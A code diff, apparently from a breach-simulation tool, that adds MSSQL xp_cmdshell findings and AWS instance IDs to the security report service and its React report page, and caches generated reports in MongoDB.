if 'aws_instance_id' in aws_instance_id_list[0]:
|
||||
return str(aws_instance_id_list[0]['aws_instance_id'])
|
||||
else:
|
||||
return None
|
||||
|
||||
@staticmethod
|
||||
def get_issues():
|
||||
ISSUE_GENERATORS = [
|
||||
|
@ -556,14 +580,18 @@ class ReportService:
|
|||
PTHReportService.get_duplicated_passwords_issues,
|
||||
PTHReportService.get_strong_users_on_crit_issues
|
||||
]
|
||||
|
||||
issues = functools.reduce(lambda acc, issue_gen: acc + issue_gen(), ISSUE_GENERATORS, [])
|
||||
|
||||
issues_dict = {}
|
||||
for issue in issues:
|
||||
if issue.get('is_local', True):
|
||||
machine = issue.get('machine').upper()
|
||||
aws_instance_id = ReportService.get_machine_aws_instance_id(issue.get('machine'))
|
||||
if machine not in issues_dict:
|
||||
issues_dict[machine] = []
|
||||
if aws_instance_id:
|
||||
issue['aws_instance_id'] = aws_instance_id
|
||||
issues_dict[machine].append(issue)
|
||||
logger.info('Issues generated for reporting')
|
||||
return issues_dict
|
||||
|
@ -625,6 +653,8 @@ class ReportService:
|
|||
issues_byte_array[ReportService.ISSUES_DICT.STRUTS2.value] = True
|
||||
elif issue['type'] == 'weblogic':
|
||||
issues_byte_array[ReportService.ISSUES_DICT.WEBLOGIC.value] = True
|
||||
elif issue['type'] == 'mssql':
|
||||
issues_byte_array[ReportService.ISSUES_DICT.MSSQL.value] = True
|
||||
elif issue['type'] == 'hadoop':
|
||||
issues_byte_array[ReportService.ISSUES_DICT.HADOOP.value] = True
|
||||
elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \
|
||||
|
@ -659,26 +689,17 @@ class ReportService:
|
|||
|
||||
@staticmethod
|
||||
def is_report_generated():
|
||||
generated_report = mongo.db.report.find_one({'name': 'generated_report'})
|
||||
if generated_report is None:
|
||||
return False
|
||||
return generated_report['value']
|
||||
generated_report = mongo.db.report.find_one({})
|
||||
return generated_report is not None
|
||||
|
||||
@staticmethod
|
||||
def set_report_generated():
|
||||
mongo.db.report.update(
|
||||
{'name': 'generated_report'},
|
||||
{'$set': {'value': True}},
|
||||
upsert=True)
|
||||
logger.info("Report marked as generated.")
|
||||
|
||||
@staticmethod
|
||||
def get_report():
|
||||
def generate_report():
|
||||
domain_issues = ReportService.get_domain_issues()
|
||||
issues = ReportService.get_issues()
|
||||
config_users = ReportService.get_config_users()
|
||||
config_passwords = ReportService.get_config_passwords()
|
||||
cross_segment_issues = ReportService.get_cross_segment_issues()
|
||||
monkey_latest_modify_time = list(NodeService.get_latest_modified_monkey())[0]['modifytime']
|
||||
|
||||
report = \
|
||||
{
|
||||
|
@ -710,15 +731,59 @@ class ReportService:
|
|||
{
|
||||
'issues': issues,
|
||||
'domain_issues': domain_issues
|
||||
},
|
||||
'meta':
|
||||
{
|
||||
'latest_monkey_modifytime': monkey_latest_modify_time
|
||||
}
|
||||
}
|
||||
|
||||
finished_run = NodeService.is_monkey_finished_running()
|
||||
if finished_run:
|
||||
ReportService.set_report_generated()
|
||||
ReportExporterManager().export(report)
|
||||
mongo.db.report.drop()
|
||||
mongo.db.report.insert_one(ReportService.encode_dot_char_before_mongo_insert(report))
|
||||
|
||||
return report
|
||||
|
||||
@staticmethod
|
||||
def encode_dot_char_before_mongo_insert(report_dict):
|
||||
"""
|
||||
mongodb doesn't allow for '.' and '$' in a key's name, this function replaces the '.' char with the unicode
|
||||
,,, combo instead.
|
||||
:return: dict with formatted keys with no dots.
|
||||
"""
|
||||
report_as_json = json_util.dumps(report_dict).replace('.', ',,,')
|
||||
return json_util.loads(report_as_json)
|
||||
|
||||
|
||||
@staticmethod
|
||||
def is_latest_report_exists():
|
||||
"""
|
||||
This function checks if a monkey report was already generated and if it's the latest one.
|
||||
:return: True if report is the latest one, False if there isn't a report or its not the latest.
|
||||
"""
|
||||
latest_report_doc = mongo.db.report.find_one({}, {'meta.latest_monkey_modifytime': 1})
|
||||
|
||||
if latest_report_doc:
|
||||
report_latest_modifytime = latest_report_doc['meta']['latest_monkey_modifytime']
|
||||
latest_monkey_modifytime = NodeService.get_latest_modified_monkey()[0]['modifytime']
|
||||
return report_latest_modifytime == latest_monkey_modifytime
|
||||
|
||||
return False
|
||||
|
||||
@staticmethod
|
||||
def decode_dot_char_before_mongo_insert(report_dict):
|
||||
"""
|
||||
this function replaces the ',,,' combo with the '.' char instead.
|
||||
:return: report dict with formatted keys (',,,' -> '.')
|
||||
"""
|
||||
report_as_json = json_util.dumps(report_dict).replace(',,,', '.')
|
||||
return json_util.loads(report_as_json)
|
||||
|
||||
@staticmethod
|
||||
def get_report():
|
||||
if ReportService.is_latest_report_exists():
|
||||
return ReportService.decode_dot_char_before_mongo_insert(mongo.db.report.find_one())
|
||||
return ReportService.generate_report()
|
||||
|
||||
@staticmethod
|
||||
def did_exploit_type_succeed(exploit_type):
|
||||
return mongo.db.edge.count(
|
||||
|
|
|
@ -24,7 +24,7 @@ class ConfigurePageComponent extends AuthComponent {
|
|||
}
|
||||
|
||||
componentDidMount() {
|
||||
this.authFetch('/api/configuration')
|
||||
this.authFetch('/api/configuration/island')
|
||||
.then(res => res.json())
|
||||
.then(res => {
|
||||
let sections = [];
|
||||
|
@ -44,7 +44,7 @@ class ConfigurePageComponent extends AuthComponent {
|
|||
onSubmit = ({formData}) => {
|
||||
this.currentFormData = formData;
|
||||
this.updateConfigSection();
|
||||
this.authFetch('/api/configuration',
|
||||
this.authFetch('/api/configuration/island',
|
||||
{
|
||||
method: 'POST',
|
||||
headers: {'Content-Type': 'application/json'},
|
||||
|
|
|
@ -29,7 +29,8 @@ class ReportPageComponent extends AuthComponent {
|
|||
STRUTS2: 8,
|
||||
WEBLOGIC: 9,
|
||||
HADOOP: 10,
|
||||
PTH_CRIT_SERVICES_ACCESS: 11
|
||||
PTH_CRIT_SERVICES_ACCESS: 11,
|
||||
MSSQL: 12
|
||||
};
|
||||
|
||||
Warning =
|
||||
|
@ -341,6 +342,8 @@ class ReportPageComponent extends AuthComponent {
|
|||
<li>Hadoop/Yarn servers are vulnerable to remote code execution.</li> : null }
|
||||
{this.state.report.overview.issues[this.Issue.PTH_CRIT_SERVICES_ACCESS] ?
|
||||
<li>Mimikatz found login credentials of a user who has admin access to a server defined as critical.</li>: null }
|
||||
{this.state.report.overview.issues[this.Issue.MSSQL] ?
|
||||
<li>MS-SQL servers are vulnerable to remote code execution via xp_cmdshell command.</li> : null }
|
||||
</ul>
|
||||
</div>
|
||||
:
|
||||
|
@ -412,7 +415,6 @@ class ReportPageComponent extends AuthComponent {
|
|||
<div>
|
||||
{this.generateIssues(this.state.report.recommendations.issues)}
|
||||
</div>
|
||||
|
||||
</div>
|
||||
);
|
||||
}
|
||||
|
@ -867,7 +869,23 @@ class ReportPageComponent extends AuthComponent {
|
|||
);
|
||||
}
|
||||
|
||||
|
||||
generateMSSQLIssue(issue) {
|
||||
return(
|
||||
<li>
|
||||
Disable the xp_cmdshell option.
|
||||
<CollapsibleWellComponent>
|
||||
The machine <span className="label label-primary">{issue.machine}</span> (<span
|
||||
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to a <span
|
||||
className="label label-danger">MSSQL exploit attack</span>.
|
||||
<br/>
|
||||
The attack was made possible because the target machine used an outdated MSSQL server configuration allowing
|
||||
the usage of the xp_cmdshell command. To learn more about how to disable this feature, read <a
|
||||
href="https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-2017">
|
||||
Microsoft's documentation. </a>
|
||||
</CollapsibleWellComponent>
|
||||
</li>
|
||||
);
|
||||
}
|
||||
|
||||
generateIssue = (issue) => {
|
||||
let data;
|
||||
|
@ -935,6 +953,9 @@ class ReportPageComponent extends AuthComponent {
|
|||
case 'hadoop':
|
||||
data = this.generateHadoopIssue(issue);
|
||||
break;
|
||||
case 'mssql':
|
||||
data = this.generateMSSQLIssue(issue);
|
||||
break;
|
||||
}
|
||||
return data;
|
||||
};
|
||||
|
|
|
@ -14,4 +14,6 @@ netifaces
|
|||
ipaddress
|
||||
enum34
|
||||
PyCrypto
|
||||
boto3
|
||||
awscli
|
||||
virtualenv
|
|
@ -14,3 +14,5 @@ netifaces
|
|||
ipaddress
|
||||
enum34
|
||||
PyCrypto
|
||||
boto3
|
||||
awscli
|
Loading…
Reference in New Issue